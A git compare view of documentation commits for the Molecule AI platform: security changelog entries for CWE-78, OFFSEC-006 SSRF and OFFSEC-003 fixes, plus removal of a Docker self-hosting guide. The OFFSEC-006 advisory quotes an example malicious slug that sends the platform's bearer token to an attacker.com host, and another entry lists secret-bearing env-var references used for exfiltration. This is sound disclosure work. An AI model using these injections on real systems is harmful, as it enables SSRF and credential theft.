Compare commits

..

8 Commits

Author SHA1 Message Date
app-fe c10e38db13 fix(docs): remove duplicate OFFSEC-006 and 2026-05-15 entries per hongming-pc2 review
Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 08:53:04 +00:00
documentation-specialist 7579152414 docs(changelog): update docs#40 → docs#46 for self-hosted Docker guide entry
Secret scan / secret-scan (pull_request) Successful in 0s
CI / build (pull_request) Successful in 3m21s
docs#40 is closed; the tutorial file is now on docs#46's branch.
Updated the entry to reference docs#46 and mention the Kubernetes
terminationGracePeriodSeconds fix.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 05:16:50 +00:00
documentation-specialist a491773cd7 docs(changelog): replace 2026-05-15 placeholder with full daily entry
CI / build (pull_request) Failing after 14m17s
Secret scan / secret-scan (pull_request) Failing after 14m11s
Covers all docs PRs merged 2026-05-15:
- docs#44: MCP HTTP/SSE transport gap-fill
- docs#41: OFFSEC-006 SSRF advisory published
- docs#40: self-hosted Docker deployment guide
- docs#30: dev-channels flag requirement page
- docs#29: remote-workspaces graceful shutdown
- docs#32: PLATFORM_URL defaults fix
- docs#31: CWE-22 regression advisory added
- docs#27: SOP checklist gate
- docs#28/37/36/33: changelog structural fixes

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 04:53:17 +00:00
documentation-specialist 65942ab786 docs(changelog): add OFFSEC-006 tenant-slug SSRF advisory to 2026-05-14 + security changelog
CI / build (pull_request) Failing after 12m0s
Secret scan / secret-scan (pull_request) Failing after 11m57s
Adds molecule-core#933 (OFFSEC-006, CWE-918 SSRF + token exfiltration)
to the 2026-05-14 Security section in changelog.mdx.

Also adds OFFSEC-006 to the Security Changelog (security/changelog.md)
with full vulnerability + fix details, cross-referencing docs#41
(offsec-006-slug-ssrf-advisory.mdx) which will add the full
advisory page when it merges.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 04:30:57 +00:00
documentation-specialist a8ae866ce1 docs(changelog): add 2026-05-15 placeholder section
Secret scan / secret-scan (pull_request) Successful in 1m36s
CI / build (pull_request) Successful in 5m21s
Day 2026-05-15 begins with no merged PRs (cron fired at 02:15 UTC;
entry will be populated at 23:50 UTC when the day is finalised).

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 02:22:16 +00:00
documentation-specialist e409a67539 docs(changelog): add openclaw#4 config fix to 2026-05-14 entry
Secret scan / secret-scan (pull_request) Successful in 0s
CI / build (pull_request) Successful in 3m9s
Adds the openclaw workspace template models-in-runtime_config bug fix
to today's changelog alongside the existing CWE-78 + OFFSEC-003 entries.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 00:01:02 +00:00
documentation-specialist 6520454764 docs(changelog): add OFFSEC-003 workspace-side boundary escaping — molecule-core#1073
Secret scan / secret-scan (pull_request) Successful in 44s
CI / build (pull_request) Successful in 3m0s
Adds the workspace-side OFFSEC-003 hardening entry to the 2026-05-14
changelog section already opened in docs#45.

Changes:
- changelog.mdx: OFFSEC-003 workspace boundary escaping + closer truncation
  added to the 2026-05-14 security section alongside CWE-78 entry

Note: core#1075 (OFFSEC-010 symlink in provisioner) is SaaS-only
provisioner detail — no public docs needed.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-14 22:21:11 +00:00
documentation-specialist 32f15dc591 docs(security): add CWE-78 expandWithEnv regression fix to changelog
Secret scan / secret-scan (pull_request) Successful in 1s
CI / build (pull_request) Successful in 2m21s
Pairs molecule-core#1030 (Critical). Restores POSIX shell-identifier
guard in expandWithEnv(org_helpers.go:82) that was inadvertently
removed during a regression window. The guard blocks org YAML injection
of env-var references like \${HOME} / \${DOCKER_HOST} into
workspace_dir and channel config fields.

Changes:
- security/changelog.md: new "2026-05-14 — CWE-78 Regression in
  expandWithEnv POSIX-identifier Guard" entry (Critical)
- changelog.mdx: new "2026-05-14" section with security + bugfix entries

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-14 16:18:22 +00:00
3 changed files with 53 additions and 198 deletions
+22
View File
@@ -8,6 +8,28 @@ Entries are published daily at 23:50 UTC.
---
## 2026-05-14
### 🔒 Security
- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables — blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Two-layer fix applied: `set -f` disables bash glob expansion (preventing metacharacter injection via `*`, `?`, `[`), and `validate_slug()` rejects any slug not matching RFC-1123 (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) with exit code 64 before any network call. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization — so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073))
### 🐛 Bug fixes
- **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above — restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990))
- **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988))
- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers → a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4))
### 🧹 Internal
- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035))
- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999))
---
## 2026-05-12
### 🔒 Security
+31
View File
@@ -9,6 +9,37 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
---
## 2026-05-14 — CWE-78: Regression in `expandWithEnv` POSIX-identifier Guard
**Severity:** Critical (CWE-78)
**PR:** [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pull/1030)
**Affected:** `workspace-server/internal/handlers/org_helpers.go``expandWithEnv`
### Vulnerability
`expandWithEnv` expands `${VAR}` and `$VAR` references in org YAML configuration fields (notably `workspace_dir` and channel config) using the current process environment. The POSIX shell-identifier guard was inadvertently removed during a regression window between staging and main promotion, causing digit-prefixed and empty keys to be passed through to `os.Getenv` instead of being returned literally.
An attacker who can supply org YAML (e.g., via a compromised org template import or a malicious admin account) could inject references such as `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`, or `${PATH}` to exfiltrate host secrets into workspace or channel configuration fields.
### Fix
Restored the POSIX identifier guard at `org_helpers.go:82`. Keys not starting with `[a-zA-Z_]` (including empty key) are now returned literally as `$key` without consulting `os.Getenv`:
```go
c := key[0]
if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_') {
return "$" + key // not a valid shell identifier — return literally
}
```
Regression tests cover `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`.
### User-facing summary
Org YAML configuration fields no longer expand invalid shell identifiers as environment variables. Configurations containing `${0}`, `${}`, or `${1VAR}` patterns are returned as-is. If you observe literal `$` prefixes appearing in workspace directory or channel configuration fields after upgrading, this indicates a previously-masked configuration issue — contact support.
---
## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
**Severity:** High (CWE-22)
@@ -1,198 +0,0 @@
---
title: Self-Hosted Workspace Deployment with Docker
---
# Self-Hosted Workspace Deployment with Docker
This guide covers running a Molecule AI workspace agent as a Docker container on a self-hosted server or VM. It covers the Docker image, required environment variables, the built-in healthcheck, graceful shutdown, and Kubernetes deployment considerations.
> **Prerequisites:** A running Molecule AI control plane (self-hosted or SaaS), an `ADMIN_TOKEN` or org-scoped API key with admin scope, and Docker 20.10+ on the host.
## How the workspace container works
The Molecule AI workspace Dockerfile includes:
- A uvicorn server on port 8000 (configurable via `PORT`)
- A healthcheck endpoint at `/.well-known/agent-card.json` (used by Docker and Kubernetes probes)
- Graceful SIGTERM handling via uvicorn — the heartbeat loop and adapter tasks shut down cleanly
```
┌─────────────────────────────────────────────┐
│ Docker host (your VM / bare metal) │
│ │
│ ┌─────────────────────────────────────┐ │
│ │ workspace container │ │
│ │ │ │
│ │ uvicorn (port 8000) │ │
│ │ └─ /.well-known/agent-card.json ← HEALTHCHECK │ │
│ │ │ │
│ │ heartbeat loop + A2A agent │ │
│ └──────────────┬──────────────────────┘ │
│ │ │
│ host.docker.internal:8080 │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────┐ │
│ │ Molecule AI control plane │ │
│ │ (platform on port 8080) │ │
│ └─────────────────────────────────────┘ │
└─────────────────────────────────────────────┘
```
## Step 1: Create an external workspace
First register the workspace as an external (self-managed) agent on the platform.
```bash
ADMIN_TOKEN="your-admin-token"
PLATFORM_URL="https://platform.moleculesai.app" # or http://localhost:8080 for local dev
WORKSPACE=$(curl -s -X POST "${PLATFORM_URL}/workspaces" \
-H "Authorization: Bearer ${ADMIN_TOKEN}" \
-H "Content-Type: application/json" \
-d '{"name": "self-hosted-agent", "runtime": "external"}')
WORKSPACE_ID=$(echo "$WORKSPACE" | python3 -c "import json,sys; print(json.load(sys.stdin)['id'])")
echo "Workspace ID: $WORKSPACE_ID"
```
Save the returned `WORKSPACE_ID`. The workspace agent obtains its bearer token automatically during its first registration with the platform.
## Step 2: Pull the workspace image
The workspace image is published to the Molecule AI ECR registry. Contact your platform administrator for the registry prefix and credentials, then log in:
```bash
aws ecr get-login-password --region us-east-1 | \
docker login --username AWS --password-stdin "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com"
docker pull "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
```
## Step 3: Configure environment variables
| Variable | Default | Description |
|---|---|---|
| `PLATFORM_URL` | `http://localhost:8080` | Platform API URL. Inside a Docker container, use `http://host.docker.internal:8080` to reach the platform on the host machine. |
| `WORKSPACE_ID` | — | Workspace ID from Step 1 (required; no default) |
| `PORT` | `8000` | Agent server port. Must match `containerPort` in Kubernetes and the port mapped with `-p` in Docker. |
## Step 4: Run the container
### Docker (standalone)
```bash
docker run -d \
--name molecule-workspace \
-p 8000:8000 \
-e PLATFORM_URL="http://host.docker.internal:8080" \
-e WORKSPACE_ID="your-workspace-id" \
-e PORT=8000 \
"${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
```
> **Note for Linux hosts:** Docker does not include `host.docker.internal` by default. On Linux, either add `--add-host=host.docker.internal:host-gateway` to the `docker run` command, or use the host machine's IP address directly (e.g. `http://192.168.1.100:8080`).
### Verify the healthcheck
```bash
# Wait for the container to become healthy (up to ~2 minutes)
docker inspect --format='{{.State.Health.Status}}' molecule-workspace
# Expected output: healthy
# Once healthy, the agent card is reachable:
curl -s http://localhost:8000/.well-known/agent-card.json | python3 -m json.tool
```
### Docker Compose
```yaml
services:
molecule-workspace:
image: "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
ports:
- "8000:8000"
environment:
PLATFORM_URL: "http://host.docker.internal:8080"
WORKSPACE_ID: "your-workspace-id"
PORT: "8000"
# Linux hosts: add host.docker.internal resolution
# extra_hosts:
# - "host.docker.internal:host-gateway"
restart: unless-stopped
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:8000/.well-known/agent-card.json"]
interval: 30s
timeout: 5s
retries: 3
start_period: 30s
```
## Step 5: Graceful shutdown
When the container receives SIGTERM (e.g. from `docker stop` or Kubernetes pod deletion), the workspace's uvicorn server initiates graceful shutdown: the heartbeat loop stops, active A2A tasks are given a grace period to complete, and any snapshotable state is persisted before the process exits.
To integrate the heartbeat loop into custom agent code:
```python
import asyncio
import os, signal
from heartbeat import HeartbeatLoop
# SIGTERM is handled by the Docker runtime, which sends the signal to the
# workspace process. The workspace (via uvicorn) initiates graceful shutdown:
# the heartbeat loop is stopped, any active adapter tasks are cancelled, and
# in-flight A2A requests are given a grace period to complete.
#
# For custom integration with the heartbeat loop directly:
async def main():
heartbeat = HeartbeatLoop(
platform_url=os.environ["PLATFORM_URL"],
workspace_id=os.environ["WORKSPACE_ID"],
)
heartbeat.start()
try:
await asyncio.Event().wait() # keep running
finally:
await heartbeat.stop()
print("Heartbeat loop stopped.")
```
The Docker `stop` command sends SIGTERM and waits up to 10 seconds by default before sending SIGKILL. The healthcheck ensures orchestrators detect an unhealthy container before the SIGTERM timeout.
## Kubernetes deployment
For Kubernetes deployments, use the native liveness/readiness probe configuration instead of the Docker HEALTHCHECK:
```yaml
ports:
- name: http
containerPort: 8000
livenessProbe:
httpGet:
path: /.well-known/agent-card.json
port: http
initialDelaySeconds: 30
periodSeconds: 30
timeoutSeconds: 5
failureThreshold: 3
readinessProbe:
httpGet:
path: /.well-known/agent-card.json
port: http
initialDelaySeconds: 10
periodSeconds: 10
timeoutSeconds: 5
failureThreshold: 3
terminationGracePeriodSeconds: 120
```
> **Note:** The Kubernetes `terminationGracePeriodSeconds` should exceed the liveness probe failure threshold so that the probe can register a failure before the pod is killed. With `periodSeconds: 30` and `failureThreshold: 3`, the probe does not register a failure until approximately 120150s after the container becomes unhealthy. Set `terminationGracePeriodSeconds: 120` or higher.
## Troubleshooting
| Symptom | Cause | Fix |
|---|---|---|
| Container shows `unhealthy` after startup | Platform unreachable from container | Verify `PLATFORM_URL` uses `host.docker.internal` (Docker) or the correct host IP |
| `curl: (7) Failed to connect` on healthcheck | Container not fully started | Wait up to 30s; increase `start_period` |
| Agent not appearing on canvas | Wrong `WORKSPACE_ID` or expired token | Re-run registration; check platform logs |
| `host.docker.internal` not resolved | Linux host without the Docker flag | Use `--add-host=host.docker.internal:host-gateway` or the host's LAN IP |